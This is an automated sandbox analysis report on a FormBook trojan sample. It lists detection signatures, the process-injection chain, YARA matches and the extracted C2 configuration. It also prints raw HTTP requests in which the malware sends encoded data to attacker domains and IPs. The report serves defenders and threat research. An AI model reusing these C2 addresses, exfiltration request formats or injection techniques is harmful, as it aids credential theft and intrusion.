
Windows Analysis Report
PrWP76ejHO.exe

Overview

General Information

Sample Name: PrWP76ejHO.exe
Analysis ID: 756343
MD5: db102a67350060a1e967aef81118f18d
SHA1: a3131a3df17a154e41c09973ca8a9aabac29929e
SHA256: 98420cf47e19574739cff3f1f74bd3c6c70e103d0b28040b64fd3c77588c7ee7
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • PrWP76ejHO.exe (PID: 1832 cmdline: C:\Users\user\Desktop\PrWP76ejHO.exe MD5: DB102A67350060A1E967AEF81118F18D)
    • iscan.exe (PID: 1764 cmdline: "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • iscan.exe (PID: 5188 cmdline: "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • iijhlev.exe (PID: 4468 cmdline: "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
            • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WerFault.exe (PID: 5096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • iijhlev.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca MD5: 2B4B3369E04DEDD66517641DB0F5A8AB)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WerFault.exe (PID: 2436 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • ipconfig.exe (PID: 1916 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup
{"C2 list": ["www.fedefarmatour.online/dwdp/"]}
Source | Rule | Description | Author | Strings
00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x7d38:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x209e7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xc0c6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1960e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x1940c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x18eb8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1950e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x19686:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xbc91:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x18103:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1f62e:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x20751:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x1b910:$sqlite3step: 68 34 1C 7B E1
  • 0x1c488:$sqlite3step: 68 34 1C 7B E1
  • 0x1b952:$sqlite3text: 68 38 2A 90 C5
  • 0x1c4cd:$sqlite3text: 68 38 2A 90 C5
  • 0x1b969:$sqlite3blob: 68 53 D8 7F 8C
  • 0x1c4e3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
3.2.iscan.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
3.2.iscan.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x6f38:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1fbe7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xb2c6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1880e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.iscan.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x1860c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x180b8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1870e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x18886:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xae91:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x17303:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1e82e:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1f951:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.iscan.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x1ab10:$sqlite3step: 68 34 1C 7B E1
  • 0x1b688:$sqlite3step: 68 34 1C 7B E1
  • 0x1ab52:$sqlite3text: 68 38 2A 90 C5
  • 0x1b6cd:$sqlite3text: 68 38 2A 90 C5
  • 0x1ab69:$sqlite3blob: 68 53 D8 7F 8C
  • 0x1b6e3:$sqlite3blob: 68 53 D8 7F 8C
3.2.iscan.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: PrWP76ejHO.exe | ReversingLabs: Detection: 73%
Source: PrWP76ejHO.exe | Virustotal: Detection: 32%
Source: Yara match | File source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: www.fedefarmatour.online/dwdp/ | Avira URL Cloud: Label: malware
Source: http://www.t4yfrance.com/dwdp/ | Avira URL Cloud: Label: malware
Source: http://www.a8-group.com/dwdp/ | Avira URL Cloud: Label: malware
Source: http://www.fedefarmatour.online/dwdp/ | Avira URL Cloud: Label: malware
Source: inhomeyoga.com | Virustotal: Detection: 11%
Source: t4yfrance.com | Virustotal: Detection: 8%
Source: fedefarmatour.online | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Temp\iscan.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\iscan.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.fedefarmatour.online/dwdp/"]}
Source: PrWP76ejHO.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: ipconfig.pdb | source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PrWP76ejHO.exe | Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PrWP76ejHO.exe | Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\PrWP76ejHO.exe | Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\iscan.exe | Code function: 1_2_00410310 FindFirstFileExW,

Networking

Source: C:\Windows\explorer.exe | Domain query: www.fedefarmatour.online
Source: C:\Windows\explorer.exe | Domain query: www.a8-group.com
Source: C:\Windows\explorer.exe | Network Connect: 50.87.143.200 80
Source: C:\Windows\explorer.exe | Domain query: www.t4yfrance.com
Source: C:\Windows\explorer.exe | Domain query: www.inhomeyoga.com
Source: C:\Windows\explorer.exe | Network Connect: 195.110.124.133 80
Source: C:\Windows\explorer.exe | Network Connect: 194.58.112.174 80
Source: C:\Windows\explorer.exe | Network Connect: 81.88.48.71 80
Source: Malware configuration extractor | URLs: www.fedefarmatour.online/dwdp/
Source: Joe Sandbox View | ASN Name: REGISTER-ASIT
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1 | Host: www.inhomeyoga.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1 | Host: www.fedefarmatour.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1 | Host: www.t4yfrance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1 | Host: www.a8-group.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 195.110.124.133
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 70 7e 7a 5a 4a 63 63 65 5f 46 56 6a 67 77 52 64 72 38 63 74 55 71 34 50 66 66 37 4d 74 4f 47 49 72 31 64 33 6b 44 35 38 45 56 4f 4a 79 4e 50 71 54 37 30 74 55 4a 57 68 71 77 53 49 61 4a 66 7a 5a 65 62 6a 33 77 5f 50 38 56 62 38 6f 65 7a 65 57 45 47 4d 31 35 4a 4f 32 4e 6d 63 35 73 6a 4d 4e 77 66 78 31 75 6b 7a 6c 6f 49 53 41 43 46 7a 4b 37 49 48 67 51 43 7e 50 61 4e 72 79 65 63 35 78 45 77 68 54 47 46 49 69 79 76 76 73 62 59 7a 78 54 43 46 56 67 32 64 32 76 76 79 32 5a 65 7e 2d 58 36 52 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5Jdjp~zZJcce_FVjgwRdr8ctUq4Pff7MtOGIr1d3kD58EVOJyNPqT70tUJWhqwSIaJfzZebj3w_P8Vb8oezeWEGM15JO2Nmc5sjMNwfx1ukzloISACFzK7IHgQC~PaNryec5xEwhTGFIiyvvsbYzxTCFVg2d2vvy2Ze~-X6RQ).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 73 6f 4f 7a 59 6f 63 63 53 50 46 57 36 51 77 52 54 4c 38 59 74 55 32 34 50 61 76 72 4e 65 69 47 49 63 5a 64 32 47 62 35 77 6b 56 4f 4e 43 4e 4c 31 44 36 74 74 56 73 6e 68 71 41 6f 49 63 5a 66 68 37 6d 62 6a 58 77 34 51 4d 56 57 37 6f 65 77 54 32 45 47 4d 31 31 5f 4f 30 6c 32 63 35 6b 6a 4d 2d 34 66 78 33 32 6e 7a 31 6f 4a 4e 51 43 46 7a 4c 47 47 48 67 51 6f 7e 50 43 64 72 78 47 63 34 6a 73 77 74 68 7e 47 42 53 79 6f 73 73 62 47 36 41 69 67 41 6b 30 71 53 6e 58 76 7a 6a 41 4e 7e 38 65 5f 4f 48 6c 4c 58 4c 6c 4a 61 63 6f 62 37 41 67 67 7e 7a 67 44 59 4f 4b 42 67 37 79 74 62 72 75 73 50 34 6e 47 46 4d 36 69 61 44 30 38 4c 63 78 56 48 36 6e 54 4c 47 4b 51 73 56 52 54 39 77 7e 6c 6c 6d 4e 42 77 59 66 79 56 55 67 35 6d 4a 4b 49 77 44 7e 30 4f 57 57 41 45 63 59 6b 4a 38 6d 6e 6c 30 7a 51 34 39 77 62 50 6f 5a 62 4d 63 76 6e 67 6f 54 38 54 62 68 42 7e 70 7a 53 4d 39 48 74 28 67 4f 46 56 67 49 67 78 4a 56 54 28 6c 4a 72 38 57 4b 4a 36 37 32 6e 38 46 47 41 4f 59 39 7a 41 78 67 34 67 78 51 6c 34 66 76 7a 79 76 59 79 6b 4c 7a 59 73 73 71 37 53 4f 37 32 28 7a 33 30 59 55 36 6e 57 50 6f 32 4a 69 73 5a 67 48 71 4f 56 76 41 48 66 6a 4a 2d 51 62 7e 4f 6d 65 51 72 56 50 48 56 4e 41 33 55 75 76 51 52 6b 74 43 51 66 70 6a 36 57 30 78 50 6a 62 78 39 67 77 64 46 48 41 28 64 47 6b 64 51 62 46 51 68 56 73 6b 53 61 4e 37 74 55 42 44 36 76 34 48 54 36 63 6b 4b 4c 64 70 49 65 31 51 79 44 68 78 31 48 75 78 43 76 52 6a 63 28 66 4d 49 78 67 72 39 6d 4e 6f 54 58 50 32 32 7a 54 6f 71 69 72 4c 
4f 6d 55 6f 56 41 68 54 6f 30 6d 37 42 71 34 77 6c 70 79 6d 5a 53 54 58 42 77 6f 61 5a 4e 32 33 43 70 54 31 39 42 7a 53 32 36 72 61 73 7e 38 61 4a 43 39 64 73 53 62 46 33 6e 69 7e 61 46 41 71 61 68 6f 30 36 58 69 75 50 6e 75 4f 50 56 58 64 4f 79 42 39 41 28 38 52 2d 32 49 39 57 4d 58 32 6d 4b 5f 69 4b 72 6e 42 55 48 37 77 69 37 6f 38 42 7a 6a 36 65 45 32 6a 46 6f 42 51 59 74 52 71 48 67 5a 33 4f 7e 61 50 53 68 73 54 43 50 59 55 6c 4d 73 59 56 6c 4b 42 56 68 36 63 51 43 48 32 4d 70 44 59 49 43 76 37 5f 48 47 4b 49 56 37 4b 62 38 53 67 77 4a 63 4d 75 63 75 6d 39 35 49 78 4f 77 41 75 46 51 31 57 58 7e 69 58 67 62 39 44 42 58 72 36 30 33 4d 33 48 77 66 77 62 72 51 56 48 47 42 59 4c 7e 51 31 30 48 38 67 32 34 38 4b 76 4f 4c 4b 74 37 5f 75 6f 6c 6b 4c 4a 76 31 5a 68 55 56 6a 55 76 32 7a 30 32 30 4e 73 4b 38 49 57 6a 31 56 63 46 35 66 76 72 74 4e 69 53 6f 30 6e 76 56 30 55 47 70 68 47 31 5a 67 74 78 2d 38 6d 54 54 7a 46 72 46 49 6b 4b 6f 76 79 39 53 53 4e 70 71 6e 44 52 37 57 56 54 6d 41 75 56 66 70 39 46 76 77 55 6c 47 4f 7
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 78 78 72 49 62 76 44 30 68 32 78 30 53 7a 6e 56 66 47 4c 51 30 61 36 50 62 65 44 5f 35 4c 30 2d 78 4c 59 65 75 4c 48 4e 6f 36 67 71 38 69 54 47 49 35 74 72 50 78 67 71 52 36 30 6d 54 71 72 38 6b 68 78 4a 41 6f 73 36 51 57 39 57 50 6e 33 6c 6d 53 38 35 4c 73 70 4d 31 35 55 7a 49 6d 35 63 56 79 69 69 66 4a 70 4f 44 33 68 42 32 48 68 77 57 75 49 31 4c 4c 67 49 78 69 79 52 6b 70 74 33 33 34 69 35 36 75 28 54 6e 52 51 49 33 4a 31 42 62 56 4e 4d 66 78 7e 37 35 6a 52 69 31 38 78 75 48 69 43 6a 33 50 48 55 48 33 4f 30 4c 6e 52 6b 5a 31 5a 47 42 50 68 6b 52 6b 6d 4c 64 69 65 70 39 6b 57 43 4a 52 35 49 49 64 51 77 63 4b 77 5a 52 57 79 58 58 70 72 34 63 7a 6d 55 44 47 6b 6c 70 7a 34 32 44 6b 70 49 71 79 73 5f 73 31 39 31 7e 41 6a 43 34 48 4b 79 57 79 75 72 74 55 46 62 49 50 32 5a 71 54 49 51 44 4f 6d 34 45 30 32 4e 77 6a 47 56 63 31 59 45 4e 51 45 54 6f 30 77 79 63 4c 7e 42 6b 4c 5a 30 6d 6c 65 51 44 4e 75 53 37 58 69 55 79 76 39 43 6b 39 73 70 71 66 74 58 50 6b 73 6e 6b 2d 71 30 54 45 42 4f 4b 4d 32 5f 56 76 68 2d 6f 6c 33 6e 70 71 32 61 59 35 71 42 42 48 63 6e 5a 2d 70 51 54 34 42 45 45 62 5a 7a 70 6f 4b 76 36 70 43 4d 76 66 55 6a 56 4a 54 34 6a 6f 6d 33 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
THg8gZ=AUIDtdOn(FTwxxrIbvD0h2x0SznVfGLQ0a6PbeD_5L0-xLYeuLHNo6gq8iTGI5trPxgqR60mTqr8khxJAos6QW9WPn3lmS85LspM15UzIm5cVyiifJpOD3hB2HhwWuI1LLgIxiyRkpt334i56u(TnRQI3J1BbVNMfx~75jRi18xuHiCj3PHUH3O0LnRkZ1ZGBPhkRkmLdiep9kWCJR5IIdQwcKwZRWyXXpr4czmUDGklpz42DkpIqys_s191~AjC4HKyWyurtUFbIP2ZqTIQDOm4E02NwjGVc1YENQETo0wycL~BkLZ0mleQDNuS7XiUyv9Ck9spqftXPksnk-q0TEBOKM2_Vvh-ol3npq2aY5qBBHcnZ-pQT4BEEbZzpoKv6pCMvfUjVJT4jom3gA).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 32 47 48 49 61 38 72 30 70 57 78 30 51 7a 6e 58 66 47 4c 58 30 61 36 4c 62 66 57 69 7e 38 51 2d 78 36 6f 65 74 39 37 4e 76 36 67 74 6f 53 53 42 4d 35 74 2d 50 78 68 42 52 2d 30 6d 54 75 4c 38 6b 67 42 4a 41 62 30 39 54 57 39 75 4e 6e 33 6d 78 43 38 57 4c 74 46 69 31 37 51 7a 49 6c 52 63 56 44 69 69 65 63 64 4e 47 58 68 41 71 58 68 4e 63 4f 49 70 4c 4c 67 32 78 69 79 33 6b 71 56 33 33 49 79 35 36 4d 58 51 74 52 51 4e 6f 35 30 78 61 58 4e 43 54 79 47 6b 78 31 74 5f 30 4d 41 